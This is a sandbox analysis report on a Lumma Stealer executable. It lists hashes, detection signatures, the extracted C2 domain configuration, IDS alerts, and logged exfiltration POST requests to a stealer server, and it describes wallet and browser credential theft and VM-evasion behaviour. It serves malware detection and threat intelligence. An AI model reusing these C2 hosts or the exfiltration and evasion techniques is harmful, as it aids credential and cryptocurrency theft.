
Windows Analysis Report
ji2xlo1f.exe

Overview

General Information

Sample name: ji2xlo1f.exe
Analysis ID: 1577533
MD5: 9f8ca917737b3233abb943edc065659c
SHA1: ea6df1e154c02f0089c8f3c4b3acc69c01d30774
SHA256: cd4061786081eb01aa278dfff5adca5a80d827e456719e40d06f3dc9353bed22
Tags: 18521511316185215113209, bulletproof, exe, LummaStealer, user-abus3reports

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ji2xlo1f.exe (PID: 4176 cmdline: "C:\Users\user\Desktop\ji2xlo1f.exe" MD5: 9F8CA917737B3233ABB943EDC065659C)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["moutheventushz.shop", "respectabosiz.shop", "bakedstusteeb.shop", "worddosofrm.shop", "mutterissuen.shop", "conceszustyb.shop", "terracedjz.cyou", "nightybinybz.shop", "standartedby.shop"], "Build id": "FATE99--november"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: ji2xlo1f.exe PID: 4176 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: ji2xlo1f.exe PID: 4176 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: ji2xlo1f.exe PID: 4176 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T15:17:39.784288+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 23.55.153.106 | 443 | TCP
2024-12-18T15:17:43.119365+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:46.797919+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:49.546406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:55.562519+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49761 | 104.21.66.86 | 443 | TCP
2024-12-18T15:18:00.002374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-18T15:18:04.470967+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49782 | 104.21.66.86 | 443 | TCP
2024-12-18T15:18:07.954372+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49790 | 104.21.66.86 | 443 | TCP
2024-12-18T15:18:15.647919+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49817 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:45.454383+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:47.991015+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:45.454383+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49724 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:47.991015+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:37.383090+0100 | 2057261 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 55807 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.962636+0100 | 2057259 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 62264 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:37.754474+0100 | 2057255 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64818 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.192611+0100 | 2057267 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 57083 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.738535+0100 | 2057263 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 57779 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:37.613350+0100 | 2057257 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 61328 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.424197+0100 | 2057265 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 57898 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:35.709139+0100 | 2057352 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63769 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:36.052127+0100 | 2057269 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 55056 | 1.1.1.1 | 53 | UDP
2024-12-18T15:17:54.184493+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | TCP
2024-12-18T15:17:41.246844+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49715 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: ji2xlo1f.exe | Avira: detected
Source: 1.2.ji2xlo1f.exe.6a0000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["moutheventushz.shop", "respectabosiz.shop", "bakedstusteeb.shop", "worddosofrm.shop", "mutterissuen.shop", "conceszustyb.shop", "terracedjz.cyou", "nightybinybz.shop", "standartedby.shop"], "Build id": "FATE99--november"}
Source: ji2xlo1f.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: ji2xlo1f.exe | Joe Sandbox ML: detected
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: moutheventushz.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: respectabosiz.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: bakedstusteeb.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: conceszustyb.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: nightybinybz.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: standartedby.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: mutterissuen.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: worddosofrm.shop
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: terracedjz.cyou
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String decryptor: FATE99--november
Source: ji2xlo1f.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49790 version: TLS 1.2
Source: ji2xlo1f.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

Source: Network traffic | Suricata IDS: 2057265 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (standartedby .shop) : 192.168.2.6:57898 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057261 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bakedstusteeb .shop) : 192.168.2.6:55807 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057267 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mutterissuen .shop) : 192.168.2.6:57083 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057259 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (conceszustyb .shop) : 192.168.2.6:62264 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057257 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (respectabosiz .shop) : 192.168.2.6:61328 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057269 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) : 192.168.2.6:55056 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057263 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nightybinybz .shop) : 192.168.2.6:57779 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057352 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (terracedjz .cyou) : 192.168.2.6:63769 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057255 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (moutheventushz .shop) : 192.168.2.6:64818 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49715 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49747 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: moutheventushz.shop
Source: Malware configuration extractor | URLs: respectabosiz.shop
Source: Malware configuration extractor | URLs: bakedstusteeb.shop
Source: Malware configuration extractor | URLs: worddosofrm.shop
Source: Malware configuration extractor | URLs: mutterissuen.shop
Source: Malware configuration extractor | URLs: conceszustyb.shop
Source: Malware configuration extractor | URLs: terracedjz.cyou
Source: Malware configuration extractor | URLs: nightybinybz.shop
Source: Malware configuration extractor | URLs: standartedby.shop
Source: Joe Sandbox View | IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49782 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49790 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49817 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 50 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12940 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=JG9YBKYFZRJ37RVVVV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15102 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KCMPRRNRVFVVVVVVVVVVVVV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19996 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=J916AMKVVVNFNRVVVVVVVVVVVVVVV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1317 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=CAJ77ABBJ773RVVVVVVVVVVVVVVVVVV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 594472 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://communit equals www.youtube.com (Youtube)
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: y.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: terracedjz.cyou
Source: global traffic | DNS traffic detected: DNS query: worddosofrm.shop
Source: global traffic | DNS traffic detected: DNS query: mutterissuen.shop
Source: global traffic | DNS traffic detected: DNS query: standartedby.shop
Source: global traffic | DNS traffic detected: DNS query: nightybinybz.shop
Source: global traffic | DNS traffic detected: DNS query: conceszustyb.shop
Source: global traffic | DNS traffic detected: DNS query: bakedstusteeb.shop
Source: global traffic | DNS traffic detected: DNS query: respectabosiz.shop
Source: global traffic | DNS traffic detected: DNS query: moutheventushz.shop
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
